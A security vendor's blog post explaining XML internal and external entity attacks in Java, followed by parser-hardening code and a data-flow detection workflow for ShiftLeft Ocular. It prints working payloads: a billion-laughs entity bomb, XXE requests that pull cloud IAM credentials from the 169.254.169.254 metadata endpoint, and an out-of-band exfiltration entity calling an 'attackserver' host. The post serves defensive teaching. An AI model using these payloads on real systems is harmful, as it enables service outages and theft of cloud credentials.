Detecting Chained XXE (XML External Entity) to DOS (Denial of Service) or SSRF (Server Side Request Forgery) using ShiftLeft Ocular

Chetan Conikee
Oct 10, 2019

A significant number of enterprises use XML as a data exchange format. XML is the de facto standard for exchanging messages between enterprise applications in a Service-Oriented Architecture. Messages that conform to the canonical model are converted back and forth to XML.

If you have ever worked in an enterprise context, you know that life there isn’t simple, and neither are the types of data and relationships you come across. This is an environment where XML shines as a data format with an extensible schema to represent complex business processes in the real world.

Many industry standards have evolved over the years that are based on XML. Years of work and expertise have gone into these standards. In particular, this is the case in finance (ESMA TRACE, MIFID, XBRL), retail, healthcare (HL7), life sciences (CDISC), and public sector (EU) just to name a few. In the publishing industry, XML is used throughout the document processing workflow. It is also the standard for Office file formats such as Word, Excel, PowerPoint or the Google Docs equivalents.

XIE (XML Internal Entity) Attack — LOL! based Denial Of Service

The body of an XML document cannot contain certain special characters (<, &) literally. They are written as entity references instead (&lt;, &amp;). Beyond these predefined entities, XML also lets you define your own entities in a dedicated section of the document, the document type declaration (DOCTYPE).

<!DOCTYPE biz [    
<!ENTITY dry "Don't Repeat Yourself" > <!-- definition -->
]><text>&dry;</text> <!-- usage -->

All we need to do is to write the doctype declaration and define the custom entity in it. After that, we can use our new internal entity in an XML document. As a result, the parser will replace every &dry; occurrence with ‘Don’t Repeat Yourself’ text. Unfortunately, this feature puts us in danger.
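To make the substitution concrete, here is a minimal Java sketch that parses the document above with the JDK's default DOM parser and reads back the expanded text. The class name InternalEntityDemo and the helper rootText are hypothetical names chosen for illustration, and the sketch assumes the JDK's built-in parser with its default settings.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

// Hypothetical demo class; names are illustrative and not taken from the article.
class InternalEntityDemo {

    // The example document: the entity is defined in the DOCTYPE and used in the body.
    static final String XML =
        "<!DOCTYPE biz [\n"
      + "<!ENTITY dry \"Don't Repeat Yourself\">\n"
      + "]><text>&dry;</text>";

    // Parses the XML with a default (unhardened) DOM parser and
    // returns the text content of the root element.
    static String rootText(String xml) {
        try {
            DocumentBuilder builder =
                DocumentBuilderFactory.newInstance().newDocumentBuilder();
            Document doc = builder.parse(new InputSource(new StringReader(xml)));
            return doc.getDocumentElement().getTextContent();
        } catch (Exception e) {
            throw new IllegalStateException("parsing failed", e);
        }
    }

    public static void main(String[] args) {
        // The parser has already replaced &dry; by the time we read the text.
        System.out.println(rootText(XML));
    }
}
```

The caller never sees the entity reference: the expansion happens inside the parser, which is exactly why the application code has no chance to inspect or limit it.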

Let’s look at the very simple, yet dangerous denial of service (DoS) attack called the Billion laughs attack.

In order to carry out the attack, you need to prepare malicious XML using internal entities and use it as an input.

<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lola "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lolb "&lola;&lola;&lola;&lola;&lola;&lola;&lola;&lola;&lola;&lola;">
<!ENTITY lolc "&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;">
<!ENTITY lold "&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;">
<!ENTITY lole "&lold;&lold;&lold;&lold;&lold;&lold;&lold;&lold;&lold;&lold;">
<!ENTITY lolf "&lole;&lole;&lole;&lole;&lole;&lole;&lole;&lole;&lole;&lole;">
<!ENTITY lolg "&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;">
<!ENTITY lolh "&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;">
<!ENTITY loli "&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;">
]>
<attack>&loli;</attack>

When an XML parser loads this document, it will try to resolve the loli entity. At first, loli expands to ten lolh entities, each lolh expands to ten lolg entities, and so on down to lol. As a result, we get 1 billion “lol” strings.

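This imposes a huge burden on the hosting compute resources and can severely impede application responsiveness! A payload of less than 1 KB expands to roughly 3 GB of text (one billion copies of a three-character string), so memory consumption grows exponentially with the number of entity levels and can exhaust the memory available to the host.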
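The size of the expansion can be checked with a few lines of arithmetic. The sketch below is only an illustration (the class and method names are hypothetical): it multiplies the fan-out of ten across the nine entity levels lola through loli.

```java
// Hypothetical helper for illustration; not part of any library.
class BillionLaughsSize {

    // Number of base strings produced when each of `levels` entities
    // references the previous level `fanOut` times.
    static long expandedCopies(int fanOut, int levels) {
        long copies = 1;
        for (int i = 0; i < levels; i++) {
            // multiplyExact throws ArithmeticException instead of silently overflowing
            copies = Math.multiplyExact(copies, (long) fanOut);
        }
        return copies;
    }

    public static void main(String[] args) {
        long copies = expandedCopies(10, 9);          // lola .. loli are 9 levels
        long characters = copies * "lol".length();    // each copy is 3 characters
        System.out.println(copies + " copies, " + characters + " characters");
    }
}
```

Adding just one more entity level multiplies the result by ten again, which is why the payload stays tiny while the expanded text does not.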

XXE (XML External Entity) Attack chained to SSRF (Server Side Request Forgery)— Metadata exfiltration

Entities can also be imported from external URIs and can lead to XXE attacks.

<!DOCTYPE xxe [       
<!ENTITY externalEntity SYSTEM "ADD URI HERE">
]>

Let’s use an example to illustrate this. Imagine that we have two endpoints:

1. One for listing all posts
2. One for creating new posts

With this in mind, we can prepare malicious XML input and use the endpoint to create a new post. The input data could look like this:

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY externalEntity SYSTEM
"http://169.254.169.254/latest/meta-data/iam/security-credentials">
]>
<foo>
&externalEntity;
</foo>

In a subsequent iteration, we can use another endpoint to list all posts. If the attack succeeds, the response will look like this:

ApplicationRole

By appending the role name (received in the response to the prior iteration) to the metadata URL, the attacker will be able to retrieve the access key ID, secret access key, and session token issued by the hosting cloud provider.

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY externalEntity SYSTEM
"http://169.254.169.254/latest/meta-data/iam/security-credentials/ApplicationRole">
]>
<foo>
&externalEntity;
</foo>

If the attack succeeds, the response will look like this:

{   
"Code" : "Success",
"LastUpdated" : "2018-01-25T23:15:40Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "AKJBD787XXXXXXXX",
"SecretAccessKey" : "XXXXXXXXXXX",
"Token" : "ZXXXXXXXXXX",
"Expiration" : "2018-01-26T05:40:31Z"
}

As you can see, this is really dangerous and can lead to serious security problems!
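The reason this works is that the parser itself dereferences the URI on the server side. The following Java sketch makes that visible without sending any network traffic: it installs an EntityResolver that records the URI the parser asks for and hands back an empty replacement. The class name ExternalEntityTrace and the method requestedUris are hypothetical, and the sketch assumes the JDK's built-in parser with default settings.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.InputSource;

// Hypothetical demo class; names are illustrative and not taken from the article.
class ExternalEntityTrace {

    // The malicious document from the example, reduced to its XML body.
    static final String XML =
        "<!DOCTYPE foo [\n"
      + "<!ELEMENT foo ANY>\n"
      + "<!ENTITY externalEntity SYSTEM\n"
      + "\"http://169.254.169.254/latest/meta-data/iam/security-credentials\">\n"
      + "]>\n"
      + "<foo>&externalEntity;</foo>";

    // Parses the XML with a default DOM parser and returns every system
    // identifier the parser tried to resolve. Nothing is actually fetched:
    // the resolver answers each request with an empty entity.
    static List<String> requestedUris(String xml) {
        List<String> requested = new ArrayList<>();
        try {
            DocumentBuilder builder =
                DocumentBuilderFactory.newInstance().newDocumentBuilder();
            builder.setEntityResolver((publicId, systemId) -> {
                requested.add(systemId);                       // record the attempt
                return new InputSource(new StringReader(""));  // empty replacement
            });
            builder.parse(new InputSource(new StringReader(xml)));
        } catch (Exception e) {
            throw new IllegalStateException("parsing failed", e);
        }
        return requested;
    }

    public static void main(String[] args) {
        System.out.println(requestedUris(XML));
    }
}
```

Without the recording resolver, an unhardened parser would attempt the HTTP request itself, from inside the server's network, which is what turns XXE into SSRF.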

What if there is only an API to create and not list information? This would impede an attacker from receiving feedback or a response reflectively.

You might think you are safe, but that’s not true. The attacker can host a file containing parameter entity definitions and register an endpoint that listens to every request and logs the results.

<!-- File hosted by the attacker, containing the parameter entity definition -->
<!ENTITY % paramEntityDefiningExternalEntity '<!ENTITY sniffTraffic SYSTEM "http://attackserver/sniff_log?%result;">'>

<!-- XML document submitted by the attacker -->
<!DOCTYPE xxe [
<!ENTITY % paramEntity SYSTEM "URI to file with parameter entity definitions" >
%paramEntity;
%paramEntityDefiningExternalEntity;
]>
<post author="consumer" topic="XXE" content="&sniffTraffic;" />

Safe Coding to prevent XXE Chaining

Most Java XML parsers have XXE enabled by default. Listed below is a code snippet that takes the necessary precautions to prevent XIE- and XXE-based attacks.

The precautionary measures take into account different versions of the JDK runtime by setting the appropriate features, which collectively prevent an XXE/XIE attack across disparate versions and runtimes.
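As an illustration of what such precautions typically look like, here is a minimal sketch of a hardened DocumentBuilderFactory. It is not necessarily the exact feature set used in the original snippet: the feature URIs are the ones commonly recommended for the JDK's built-in Xerces-based parser, and the class name HardenedXmlParser and its helper methods are hypothetical.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

// Hypothetical helper class; a sketch under the assumptions stated above.
class HardenedXmlParser {

    static DocumentBuilder newHardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // Ask the implementation to apply its own processing limits.
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Reject any document that carries a DOCTYPE; this blocks XIE and XXE alike.
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defense in depth in case DOCTYPEs must be allowed later on.
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf.newDocumentBuilder();
    }

    // Returns true if the hardened parser refuses the document.
    static boolean isRejected(String xml) {
        try {
            newHardenedBuilder().parse(new InputSource(new StringReader(xml)));
            return false;
        } catch (SAXException e) {
            return true;   // the parser raised a fatal error, e.g. for the DOCTYPE
        } catch (Exception e) {
            throw new IllegalStateException("unexpected failure", e);
        }
    }

    public static void main(String[] args) {
        String withDoctype =
            "<!DOCTYPE lolz [<!ENTITY lol \"lol\">]><attack>&lol;</attack>";
        System.out.println("DOCTYPE rejected: " + isRejected(withDoctype));
        System.out.println("plain XML rejected: " + isRejected("<text>ok</text>"));
    }
}
```

Setting several overlapping features is deliberate: a parser implementation that does not honor one of them throws ParserConfigurationException at setup time, so a misconfiguration surfaces before any untrusted input is parsed.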

Can these safe coding checks be verified using Ocular?

Yes. Using Ocular’s data flow tracking, the following checks can be performed to ensure that there is no risk of an XXE/XIE attack:

  1. Identify the untrusted, attacker-controlled vector (content, in this case)
  2. Mark DocumentBuilderFactory.newInstance() as a source in the data flow
  3. Mark builder.parse(new ByteArrayInputStream(content.getBytes())) as a sink
  4. Conduct reachability analysis between the source and the sink for flows influenced by the attacker-controlled vector
  5. Use Ocular’s passes construct to verify that all safety features are enabled (as prescribed above) in the data flow that originates at the source, before the attacker-controlled vector touches the sensitive sink.
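To picture the flow these steps describe, here is a minimal Java sketch of the vulnerable pattern, with comments marking where each step applies. It is an illustration only and not the code from the POC codebase: the class name XxeFlowSketch and the method parseRootName are hypothetical, and content stands in for whatever attacker-controlled input reaches the parser.

```java
import java.io.ByteArrayInputStream;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// Hypothetical sketch of the flow under analysis; names are illustrative.
class XxeFlowSketch {

    // Step 1: `content` is the untrusted, attacker-controlled vector.
    static String parseRootName(String content) {
        try {
            // Step 2 (source): the factory is created with default settings.
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

            // Step 5 inspects this stretch of the flow: no safety feature is
            // set on `factory` here, so the check for hardening would fail.
            DocumentBuilder builder = factory.newDocumentBuilder();

            // Step 3 (sink): attacker-controlled bytes reach the parser.
            // Step 4 asks whether `content` can reach this call at all.
            Document doc = builder.parse(new ByteArrayInputStream(content.getBytes()));
            return doc.getDocumentElement().getNodeName();
        } catch (Exception e) {
            throw new IllegalStateException("parsing failed", e);
        }
    }

    public static void main(String[] args) {
        // Benign input only; the point is the shape of the flow, not an attack.
        System.out.println(parseRootName("<post author=\"consumer\"/>"));
    }
}
```

A finding is a true positive when the path from source to sink exists and none of the hardening calls appears on it.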

ShiftLeft’s Ocular is an application security platform built over the foundational Code Property Graph that is uniquely positioned to deliver a specification model to query for vulnerable conditions, business logic flaws and insider attacks that might exist in your application’s codebase.

The following POC codebase https://github.com/conikeec/tarpit/blob/master/src/main/java/io/shiftleft/tarpit/DocumentTarpit.java is evaluated for this seeded condition.

Specified below is a detailed investigation log to detect XXE chaining to DOS (LOL based) or SSRF. Criteria for validation can also be evaluated to ensure that the conclusion is a true positive.

If you’d like to learn more about ShiftLeft’s Code Property Graph and Ocular, and how they can be used to help identify XXE+SSRF or XXE+DOS, please request a demo.

Happy Hunting and Hacking!

Chetan Conikee

Engineer, InfoSec tinkerer, Seed Investor, Founder/CTO of ShiftLeft Inc., (Opinions, my own)